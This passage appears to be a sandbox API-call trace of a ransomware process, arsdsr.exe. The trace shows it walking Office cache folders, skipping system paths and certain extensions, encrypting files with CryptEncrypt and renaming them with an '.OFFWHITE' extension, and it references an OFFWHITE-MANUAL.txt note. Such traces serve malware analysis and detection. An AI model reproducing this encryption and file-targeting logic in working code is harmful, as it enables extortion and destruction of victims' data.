(lpString1="ProjLR.cab", lpString2="programdata") returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="appdata") returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="program files") returned 1 [0085.379] lstrcmpiW (lpString1="ProjLR.cab", lpString2="program files (x86)") returned 1 [0085.379] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" [0085.380] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="ProjLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab" [0085.380] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.380] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.380] PathFindExtensionW (pszPath="ProjLR.cab") returned=".cab" [0085.380] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0085.380] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0085.380] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0085.380] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2=".") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="..") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="...") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="windows") returned -1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="$recycle.bin") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="rsa") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="ntuser.dat") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="programdata") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="appdata") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="program files") returned 1 [0085.380] lstrcmpiW (lpString1="Setup.xml", lpString2="program files (x86)") returned 1 [0085.380] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\" [0085.380] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\", lpString2="Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" [0085.380] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.380] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.380] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0085.380] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0085.381] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0085.381] lstrcmpiW (lpString1="Setup.xml", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0085.381] GetProcessHeap () returned 0x500000 [0085.381] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c18 [0085.381] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0085.382] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=1872) returned 1 [0085.382] GetProcessHeap () returned 0x500000 [0085.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0085.382] GetProcessHeap () returned 0x500000 [0085.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0085.382] GetProcessHeap () returned 0x500000 [0085.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0085.383] GetProcessHeap () returned 0x500000 [0085.383] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0085.383] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.383] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.383] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0085.383] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.383] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.383] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0085.383] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.383] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.383] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0085.383] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.383] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.383] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0085.383] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x750, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.384] SetLastError (dwErrCode=0x0) [0085.384] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.803] GetLastError () returned 0x0 [0085.803] GetLastError () returned 0x0 [0085.803] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x850, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.803] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0085.803] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x950, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.803] WriteFile (in: hFile=0x21c, lpBuffer=0x547c18*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c18*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0085.804] GetProcessHeap () returned 0x500000 [0085.804] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x750) returned 0x546980 [0085.804] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.804] ReadFile (in: hFile=0x21c, lpBuffer=0x546980, nNumberOfBytesToRead=0x750, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesRead=0x295e540*=0x750, lpOverlapped=0x0) returned 1 [0085.804] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.804] WriteFile (in: hFile=0x21c, lpBuffer=0x546980*, nNumberOfBytesToWrite=0x750, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x546980*, lpNumberOfBytesWritten=0x295e54c*=0x750, lpOverlapped=0x0) returned 1 [0085.804] GetProcessHeap () returned 0x500000 [0085.804] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x546980 | out: hHeap=0x500000) returned 1 [0085.804] CloseHandle (hObject=0x21c) returned 1 [0085.807] GetProcessHeap () returned 0x500000 [0085.807] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0085.807] GetProcessHeap () returned 0x500000 [0085.807] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0085.807] GetProcessHeap () returned 0x500000 [0085.807] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0085.808] GetProcessHeap () returned 0x500000 [0085.808] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0085.808] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" [0085.808] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" [0085.808] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\Setup.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-00b4-0409-1000-0000000ff1ce}-c\\setup.xml.offwhite")) returned 1 [0085.808] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x309dfcc0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x309dfcc0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5bc88d0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x750, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0085.809] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0085.809] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20001e, dwReserved1=0x295f6f0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="...") returned 1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="windows") returned -1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="$recycle.bin") returned 1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="rsa") returned -1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="ntuser.dat") returned -1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="programdata") returned -1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="appdata") returned -1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="program files") returned -1 [0085.809] lstrcmpiW (lpString1="{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="program files (x86)") returned -1 [0085.809] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0085.809] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="{90140000-00BA-0409-1000-0000000FF1CE}-C" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C" [0085.809] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" [0085.809] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" [0085.809] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" [0085.809] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0085.812] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0085.812] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0085.812] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0085.812] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0085.812] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2=".") returned 1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="..") returned 1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="...") returned 1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="windows") returned -1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="$recycle.bin") returned 1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="rsa") returned -1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="ntuser.dat") returned -1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="programdata") returned -1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="appdata") returned 1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="program files") returned -1 [0085.812] lstrcmpiW (lpString1="GrooveLR.cab", lpString2="program files (x86)") returned -1 [0085.812] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" [0085.812] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="GrooveLR.cab" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" [0085.812] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.813] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.813] PathFindExtensionW (pszPath="GrooveLR.cab") returned=".cab" [0085.813] lstrcmpiW (lpString1=".cab", lpString2=".exe") returned -1 [0085.813] lstrcmpiW (lpString1=".cab", lpString2=".log") returned -1 [0085.813] lstrcmpiW (lpString1=".cab", lpString2=".cab") returned 0 [0085.813] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2=".") returned 1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="..") returned 1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="...") returned 1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="windows") returned -1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="$recycle.bin") returned 1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="rsa") returned -1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="ntuser.dat") returned -1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="programdata") returned -1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="appdata") returned 1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="program files") returned -1 [0085.813] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="program files (x86)") returned -1 [0085.813] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" [0085.813] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="GrooveMUI.msi" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" [0085.813] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.813] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.813] PathFindExtensionW (pszPath="GrooveMUI.msi") returned=".msi" [0085.813] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0085.813] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0085.813] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0085.814] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0085.814] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2=".") returned 1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="..") returned 1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="...") returned 1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="windows") returned -1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="$recycle.bin") returned 1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="rsa") returned -1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="ntuser.dat") returned -1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="programdata") returned -1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="appdata") returned 1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="program files") returned -1 [0085.814] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="program files (x86)") returned -1 [0085.814] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\" [0085.814] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\", lpString2="GrooveMUI.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" [0085.815] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0085.815] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0085.815] PathFindExtensionW (pszPath="GrooveMUI.xml") returned=".xml" [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0085.815] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0085.815] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0085.815] GetProcessHeap () returned 0x500000 [0085.815] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c28 [0085.815] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, 